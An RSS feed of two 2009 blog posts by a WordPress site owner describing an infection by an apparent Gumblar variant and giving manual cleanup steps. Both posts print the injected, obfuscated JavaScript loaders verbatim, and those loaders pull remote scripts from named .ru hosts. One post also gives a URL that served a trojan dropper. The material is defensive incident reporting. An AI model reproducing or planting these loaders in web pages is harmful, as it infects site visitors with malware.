<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Ryan Isra &#124; Tech &#124; Life &#187; Javascript</title>
	<atom:link href="http://www.ryan-isra.net/tag/javascript/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.ryan-isra.net</link>
	<description></description>
	<lastBuildDate>Thu, 02 Feb 2012 05:49:54 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3</generator>
		<item>
		<title>How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus)</title>
		<link>http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/</link>
		<comments>http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/#comments</comments>
		<pubDate>Wed, 09 Dec 2009 16:21:26 +0000</pubDate>
		<dc:creator>Febryan Paudi</dc:creator>
				<category><![CDATA[Tutorial]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[Malicious]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Virus]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[www.ryan-isra.net]]></category>

		<guid isPermaLink="false">http://www.ryan-isra.net/?p=388</guid>
		<description><![CDATA[<span class="image-rss"><a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/"><img title="How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus)" src="http://www.ryan-isra.net/images/search_all.js.png" alt="How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus)" width="123" height="200" /></a></span><br/>As yesterday, I found unknown code at the bottom of each wordpress file (javascript and homepage index files). Furthermore, the Javascript code will load malicious file from other remote servers, which are randomized. It works similar to Gumblar virus, though it has slightly different codes and action. So far, I've found this javascript malicious code [...]
Related posts:<ol>
<li><a href='http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/' rel='bookmark' title='Malicious Javascript Code infected my blogs'>Malicious Javascript Code infected my blogs</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p style="float:right; margin:0 0 10px 15px; width:240px;">
		<img src="http://www.ryan-isra.net/images/search_all.js.png" width="240" />
		</p><span class="image-rss"><a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/"><img title="How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus)" src="http://www.ryan-isra.net/images/search_all.js.png" alt="How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus)" width="123" height="200" /></a></span><br/>As yesterday, <a href="http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/">I found unknown code at the bottom of each wordpress file</a> (javascript and homepage index files). Furthermore, the Javascript code will load malicious file from other remote servers, which are randomized. It works similar to Gumblar virus, though it has slightly different codes and action.

So far, I've found this javascript malicious code with different var value. <strong>Nhbk5v835x5dq6</strong>, <strong>H3qqea3ur6p</strong>, and <strong>Jqjzlgspz98uxl</strong>.

This code will load another malicious script from <strong>http://xtube-com.blogger.com.pornorama-com.bluejackmusic.ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/</strong>

<textarea cols="90" rows="12" readonly="readonly"><script>/*GNU GPL*/ try{window.onload = function(){var Jqjzlgspz98uxl = document.createElement('script');Jqjzlgspz98uxl.setAttribute('type', 'text/javascript');Jqjzlgspz98uxl.setAttribute('id', 'myscript1');Jqjzlgspz98uxl.setAttribute('src', 'h#&#t&#!t$!@p):)$/!&^/!x#^&t@#&u@b($!)e#(-)c^@$&o#(#m^!$^.&$)b$($l$o!(#&)g(&g)(^$e!$r#@(.@^& (c(o^#m@)!#.)#p!(@o&r@)n(^$o$!^r&!a$)&m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$ !(s@$@i^@c@&.!@)r@u(!:(^8&@!)!0@)8)@#0&(!/$&)h^d$@$f$(^c^)b@$&a)^n^(k^#.&@^&c#(!#$o^m!)#/!h^@#d(&f)&c^()b#(a^$!n&^(#$k^#.!$c)o))m)&&/($&!g$$o!)o^()g))@(l$^@)e#^&.&&c^(o()m@!)(/(&f)#a!!@n!$@p))o)((p!^#.@c^!@o&@m)@&/@!!i&n^#!.&#!c)))!o(m#/)((!'.replace(/\(|\)|\^|\!|@|\$|#|&/ig, ''));Jqjzlgspz98uxl.setAttribute('defer', 'defer');document.body.appendChild(Jqjzlgspz98uxl) ;}} catch(e) {}</script></textarea>


This code will load another malicious script from <strong>http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/</strong>

<textarea cols="90" rows="12" readonly="readonly"><script>/*GNU GPL*/ try(window.onload = function()(var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAttribute('type','text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!##t&(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m.&!#g#@o((o^g)(l^$!$)@.&)$eco$#(m#^@.)#@#!#a&b$i#!$#$d^m^h#)$!(-!((!$s)n$&(.@)c^@$o((m!(&.^)(b&!)e@s(@&t@a()r#$#)t))s@#!#)a!l#e#r$(.))&!you!&):)8($0)@$8^#^@0&)$^/!!&w@$(O@^r(^(!d^p^@#)r#e@s^(s&&@@.(^^o^c#@!$)/)&^m$g@(@^o(^o@g@&#$l&&e^))&@-($(m)#)#a)i^l^#.!&^)i!$@^/((!(t&l)!i^v&(&(e()#j^a$&@s(&m$^&(i$#@n!#^-#@)p$!$$h!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$c!&^)&/)!m@o@c#&($n)e()&&t)#-^#!c^(n^^n@c&#).)!&!o$m#($/^a$&!@@b&()^o($(u!&#)t^#-#))$e@@)b##a#y&&@.&#(^c&o^^^^m@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);)) catch(e) ()</script></textarea>


This code will load another malicious script from <strong>http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/</strong>

<textarea cols="90" rows="12" readonly="readonly"><script>/*GNU GPL*/ try{window.onload = function(){var Nhbk5v835x5dq6 = document.createElement('script');Nhbk5v835x5dq6.setAttribute('type', 'text/javascript');Nhbk5v835x5dq6.setAttribute('id', 'myscript1');Nhbk5v835x5dq6.setAttribute('src',  'h#@#$t^@#t^^!p^$:&!/(/&##g)@o^)!o)!&g)^!l$(e^-&&!c$@@n).)#!#m$(#s#!))$n)!.&^c)(!!a&.$&(!s^@#h)@&o@(p$!^&)l$&o&^!c!&)@a&l)-$^c@(^o!m@.$e((a$s^^y#m(u(#)s&&@i$c(@s!@^t)o(r^#e!@@&.)!)r!^u(#:(!8(^0$#$8)0&@@/@i#@n)!t@e^#r(^i$)$^a)#.^&p&(!&l))#^$/@(!i$)^n#(&t^#&e&$(r)&#i$)$a(@.!p^l^$/^@#g#o@#(o)()g&$$l(^e@.&&$!c(^o)m^(/)@@e&^@m#&^@p($f&l^^@!i(x!))).&^!c@o$()$m&/##!&d#e)@b$)&o(##$n^#$a)^i$r(&b@#l!^o^g@@.)#c@$@o!m(&^)/!'.replace(/@|\!|\$|&|\)|\^|#|\(/ig, ''));Nhbk5v835x5dq6.setAttribute('defer', 'defer');document.body.appendChild(Nhbk5v835x5dq6);}} catch(e) {}</script></textarea>

<span id="more-388"></span>
Some of WordPress, Joomla, and Pligg users have reported this problem in several forums. I've successfully cleaned this virus from <a href="http://iphoners.org/">my iPhone blog</a> and <a href="http://www.ryan-isra.net/">ryan-isra.net</a> as well. This tutorial will guide you how to disinfect your WordPress blog from this virus.
It's very recommended to have Notepad++ application installed in your Windows to make this process easier.
<a href="http://sourceforge.net/projects/notepad-plus/files/">You can download Notepad++ from this link</a>.

1. Login to cPanel (if applicable)
2. Edit the content of index.php in root directory to be any text (i.e. <em>Under Maintenance</em>) to protect your visitors of being infected.
3. Create a zip file of wp-content directory, download it to local computer and extract it.
4. Use search feature and find all javascript files in wp-content folder.
<img src="http://www.ryan-isra.net/images/search_all.js.png" alt="Search *.js files">

5. Open <strong>Notepad++</strong>, then select all files in <strong>Search Results</strong> screen. Drag all files into Notepad++'s window.
<img src="http://www.ryan-isra.net/images/drag_all-files.thumb.png" alt="Drag All Files">

6. Press <strong>CTRL+H</strong> key, paste the javascript malicious code in "<strong>Find what</strong>" field and leave empty the "<strong>Replace with</strong>" field.
<img src="http://www.ryan-isra.net/images/replace_all-in-all.png" alt="Replace all in all opened documents">

7. When finished, click <strong>File - Save All</strong> or simply press <strong>CTRL+SHIFT+S</strong> key.
8. Repeat the step#4 and change *.js to *index*
9. Repeat the step#8 and change *index* to *default*
10. Remember the path of each file and then re-upload each file to its own path.
11. Get a fresh copy of wordpress, copy <strong>wp-admin</strong> and <strong>wp-includes</strong> directories, compress, and upload to your hosting. 
12. Replace <strong>wp-admin</strong> and <strong>wp-includes</strong> directories in your hosting with the one that you just uploaded.
13. Now, ensure that your computer is clean of virus/keylogger/trojan and then change your cPanel/FTP password.

The process could be simpler if you have never changed/customized any of your wordpress theme/plugins. You could simply re-upload a fresh wordpress installation, themes, plugins.

I am so sleepy, sorry if something is wrong or missing.

- Update -
Please see these comments, some of them may help you better than my post.
Thanks guys.<p>what most people search here: <b><a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/" title="ryan-isra net">ryan-isra net</a>, <a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/" title="xtube virus">xtube virus</a>, <a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/" title="wordpress javascript virus">wordpress javascript virus</a>, <a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/" title="xtubes com">xtubes com</a>, <a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/" title="javascript virus">javascript virus</a>, <a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/" title="MALicious javascript download">MALicious javascript download</a>, <a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/" title="javascript virus code">javascript virus code</a>, <a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/" title="sim card inserted iphone does not appear supported">sim card inserted iphone does not appear supported</a>, <a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/" title="fix javascript code">fix javascript code</a>, <a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/" title="xtube com">xtube com</a>, <a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/" title="javascript malicious code">javascript malicious code</a>, <a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/" title="how to fix infected javascript">how to fix infected javascript</a></b><p>Related posts:<ol>
<li><a href='http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/' rel='bookmark' title='Malicious Javascript Code infected my blogs'>Malicious Javascript Code infected my blogs</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/feed/</wfw:commentRss>
		<slash:comments>18</slash:comments>
		</item>
		<item>
		<title>Malicious Javascript Code infected my blogs</title>
		<link>http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/</link>
		<comments>http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/#comments</comments>
		<pubDate>Tue, 08 Dec 2009 14:46:32 +0000</pubDate>
		<dc:creator>Febryan Paudi</dc:creator>
				<category><![CDATA[Blogging]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Script]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[Malicious]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Virus]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[www.ryan-isra.net]]></category>

		<guid isPermaLink="false">http://www.ryan-isra.net/?p=368</guid>
		<description><![CDATA[It happened since yesterday. When I was checking my blogs, I got this error message in every page. Parse error: syntax error, unexpected '&#60;' in /home/$myhomedir$/public_html/wp-includes/default-widgets.php on line 1034 I immediately open default-widgets.php in wp-includes directory by using notepad, followed by pressing CTRL + G to go to line#1034. I'm very susprised when I found [...]
Related posts:<ol>
<li><a href='http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/' rel='bookmark' title='How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus)'>How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus)</a></li>
<li><a href='http://www.ryan-isra.net/name.com-promo-coupon-code-march-2011/' rel='bookmark' title='Name.com Promo Coupon Code for March 2011'>Name.com Promo Coupon Code for March 2011</a></li>
<li><a href='http://www.ryan-isra.net/moving-www-ryan-isra-net-new-webhosting/' rel='bookmark' title='Moving www.ryan-isra.net to a new Webhosting'>Moving www.ryan-isra.net to a new Webhosting</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[It happened since yesterday. When I was checking my blogs, I got this error message in every page.

<blockquote><strong>Parse error</strong>: syntax error, unexpected '&lt;' in <strong>/home/$myhomedir$/public_html/wp-includes/default-widgets.php</strong> on line <strong>1034</strong></blockquote>

I immediately open <strong>default-widgets.php</strong> in wp-includes directory by using notepad, followed by pressing CTRL + G to go to line#1034. I'm very susprised when I found these codes were exist in default-widgets.php.

<textarea cols="90" rows="12" readonly="readonly"><script>/*GNU GPL*/ try{window.onload = function(){var Nhbk5v835x5dq6 = document.createElement('script');Nhbk5v835x5dq6.setAttribute('type', 'text/javascript');Nhbk5v835x5dq6.setAttribute('id', 'myscript1');Nhbk5v835x5dq6.setAttribute('src',  'h#@#$t^@#t^^!p^$:&!/(/&##g)@o^)!o)!&g)^!l$(e^-&&!c$@@n).)#!#m$(#s#!))$n)!.&^c)(!!a&.$&(!s^@#h)@&o@(p$!^&)l$&o&^!c!&)@a&l)-$^c@(^o!m@.$e((a$s^^y#m(u(#)s&&@i$c(@s!@^t)o(r^#e!@@&.)!)r!^u(#:(!8(^0$#$8)0&@@/@i#@n)!t@e^#r(^i$)$^a)#.^&p&(!&l))#^$/@(!i$)^n#(&t^#&e&$(r)&#i$)$a(@.!p^l^$/^@#g#o@#(o)()g&$$l(^e@.&&$!c(^o)m^(/)@@e&^@m#&^@p($f&l^^@!i(x!))).&^!c@o$()$m&/##!&d#e)@b$)&o(##$n^#$a)^i$r(&b@#l!^o^g@@.)#c@$@o!m(&^)/!'.replace(/@|\!|\$|&|\)|\^|#|\(/ig, ''));Nhbk5v835x5dq6.setAttribute('defer', 'defer');document.body.appendChild(Nhbk5v835x5dq6);}} catch(e) {}</script></textarea>
<span id="more-368"></span>
I also found similar malicious code from Google.

<textarea cols="90" rows="12" readonly="readonly"><script>/*GNU GPL*/ try(window.onload = function()(var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAttribute('type','text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 'h#!##t&(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m.&!#g#@o((o^g)(l^$!$)@.&)$eco$#(m#^@.)#@#!#a&b$i#!$#$d^m^h#)$!(-!((!$s)n$&(.@)c^@$o((m!(&.^)(b&!)e@s(@&t@a()r#$#)t))s@#!#)a!l#e#r$(.))&!you!&):)8($0)@$8^#^@0&)$^/!!&w@$(O@^r(^(!d^p^@#)r#e@s^(s&&@@.(^^o^c#@!$)/)&^m$g@(@^o(^o@g@&#$l&&e^))&@-($(m)#)#a)i^l^#.!&^)i!$@^/((!(t&l)!i^v&(&(e()#j^a$&@s(&m$^&(i$#@n!#^-#@)p$!$$h!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$c!&^)&/)!m@o@c#&($n)e()&&t)#-^#!c^(n^^n@c&#).)!&!o$m#($/^a$&!@@b&()^o($(u!&#)t^#-#))$e@@)b##a#y&&@.&#(^c&o^^^^m@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);)) catch(e) ()</script></textarea>

The 1st code above will load another malicious script from <strong>http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/</strong>, while the 2nd code above will load another malicious script from <strong>http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/</strong>

I could accessing <a href="http://iphoners.org/">my iPhone blog</a>, though another error appeared:
<strong>Can not modify header information - headers already sent by (output started at ...</strong>
At the same time, InternetDownloadManager asked me to download <strong>ChangeLog.pdf</strong> from <strong>http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/pics/ChangeLog.pdf</strong> and <a href="http://www.malwarebytes.org/">MBAM (Malwarebytes' Anti-Malware)</a> detected <strong>C:\Documents and Settings\username\Local Settings\Temp\0.5147965079164781.exe</strong> (random file name) as <strong>Trojan.Dropper</strong>. Kaspersky Anti-Virus 2009 couldn't detect it, but Kaspersky Anti-Virus 2010 detected it as <strong>unknow threat UDS: DangerousObject.Multi.Generic</strong> with <strong>High</strong> criticality.

I understand that I was being infected by a virus, though I had no idea what kind of virus was that. Searched via Google by using <strong>&lt;script&gt;/*GNU GPL*/ try{window.onload</strong> as a keyword, didn't help much, while using <strong>setAttribute('id', `myscript1`)</strong> just displaying list of websites, which has been infected. Last but not least, I used <strong>setAttribute('id', `myscript1`) virus</strong> as keyword, then it refer me to <a href="http://www.webhostingtalk.nl/beveiliging/155939-gumblar-virus.html">WebHostingTalk.nl</a>. I got a little enlightenment about what I was dealing with.

So, its name is Gumblar. You can find further information about Gumblar on <a href="http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/">Unmask Parasites Blog</a>, <a href="http://en.wikipedia.org/wiki/Gumblar">Wikipedia</a>, or <a href="http://www.iss.net/threats/gumblar.html">ISS.net</a>. I got alot of useful information. 
However, I might be infected by its variant, because it wasn't inject iframe, no base64 code, no images.php file, and even different code.

The one I got spreading itself by infected all javascript files (<strong>*.js</strong>) and index files (<strong>*index*</strong>, <strong>*default*</strong>). <a href="http://www.ryan-isra.net">www.ryan-isra.net</a>, which is hosted on same hosting also infected. So far, I suspected that either my Windows XP has infected a keylogger or someone is sniffing my network traffic :D

Now, <a href="http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/">my wordpress blog has been disinfected</a>.<p>what most people search here: <b><a href="http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/" title="UDS:DangerousObject Multi Generic">UDS:DangerousObject Multi Generic</a>, <a href="http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/" title="js/infected a">js/infected a</a>, <a href="http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/" title="malicious javascript code">malicious javascript code</a>, <a href="http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/" title="js/infected c wordpress">js/infected c wordpress</a>, <a href="http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/" title="js/infected c">js/infected c</a>, <a href="http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/" title="js infected a">js infected a</a>, <a href="http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/" title="infected js">infected js</a>, <a href="http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/" title="javascript enlightenment pdf">javascript enlightenment pdf</a>, <a href="http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/" title="js infected">js infected</a>, <a href="http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/" title="UDS:Dangerous Object Multi Generic">UDS:Dangerous Object Multi Generic</a>, <a href="http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/" title="wordpress trojan php">wordpress trojan php</a>, <a href="http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/" title="js/infected c java script virus">js/infected c java script virus</a></b><p>Related posts:<ol>
<li><a href='http://www.ryan-isra.net/howto-fix-malicious-javascript-suspected-variant-gumblar-virus/' rel='bookmark' title='How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus)'>How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus)</a></li>
<li><a href='http://www.ryan-isra.net/name.com-promo-coupon-code-march-2011/' rel='bookmark' title='Name.com Promo Coupon Code for March 2011'>Name.com Promo Coupon Code for March 2011</a></li>
<li><a href='http://www.ryan-isra.net/moving-www-ryan-isra-net-new-webhosting/' rel='bookmark' title='Moving www.ryan-isra.net to a new Webhosting'>Moving www.ryan-isra.net to a new Webhosting</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.ryan-isra.net/malicious-javascript-code-infect-blogs/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
	</channel>
</rss>

